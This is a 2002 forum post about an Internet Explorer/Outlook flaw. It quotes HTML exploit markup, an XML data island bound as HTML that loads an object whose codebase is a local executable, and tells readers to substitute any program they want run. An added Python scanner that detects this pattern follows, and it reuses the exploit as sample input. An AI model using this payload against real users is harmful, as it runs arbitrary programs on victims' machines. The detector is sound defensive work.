TechSpot

Another IE/Outlook Hole

By lokem
Mar 6, 2002
  1. The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML.

    Read the rest here:

    http://www.theregister.co.uk/content/4/24274.html

    The article also has a simple fix for this problem.

    Here's the simple script:

    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
    <security>
    <exploit>
    <![CDATA[
    <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
    ]]>
    </exploit>
    </security>
    </xml>


    Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.
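
A defensive heuristic for the markup pattern quoted in the post above, as an added example that is not part of the original post or of The Register's article: it flags an HTML body where an XML data island is bound into an element with dataformatas="html", and where an <object> tag's codebase points at a local path. The function names, finding labels and the benign sample are assumptions made for illustration.

```python
import re

TAG = re.compile(r"<\s*([a-z][\w:-]*)\b([^>]*)>", re.I)
ATTR = re.compile(r"""([\w:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# Drive-letter, UNC or file: locations, i.e. a program already on the disk.
LOCAL = re.compile(r"^\s*(?:[a-z]:[\\/]|\\\\|file:)", re.I)

# The markup quoted in the post, used here only as scanner input.
SAMPLE_POST = r"""<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object>
]]></exploit></security></xml>"""

# Constructed benign page: text-only binding, control fetched over HTTP.
SAMPLE_BENIGN = r"""<span datasrc="#d" datafld="title" dataformatas="text"></span>
<xml id="d"><r><title>hi</title></r></xml>
<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="http://example.com/control.cab"></object>"""


def tags(html):
    """Yield (tag_name, attrs) for every start tag, including tags that sit
    inside <![CDATA[ ]]>, because the binding renders that text as HTML."""
    for m in TAG.finditer(html):
        attrs = {a[0].lower(): next((v for v in a[1:] if v), "")
                 for a in ATTR.findall(m.group(2))}
        yield m.group(1).lower(), attrs


def scan(html):
    """Return a sorted list of finding labels for one HTML body."""
    found, islands, bindings = set(), set(), set()
    for name, a in tags(html):
        if name == "xml" and a.get("id"):
            islands.add(a["id"].lower())
        # Any element may carry the binding attributes, not only <span>.
        if a.get("dataformatas", "").lower() == "html" and a.get("datasrc", "").startswith("#"):
            bindings.add(a["datasrc"][1:].lower())
        if name == "object" and LOCAL.match(a.get("codebase", "")):
            found.add("object-codebase-local-path")
    if islands & bindings:  # a binding that resolves to an island in this body
        found.add("xml-island-bound-as-html")
    return sorted(found)


if __name__ == "__main__":
    for label, body in (("post", SAMPLE_POST), ("benign", SAMPLE_BENIGN)):
        print(label, scan(body))
```

The tag matcher is regex-based and stops at the first ">" in a tag, so treat a hit as a signal to quarantine or review a message rather than as a full HTML parse.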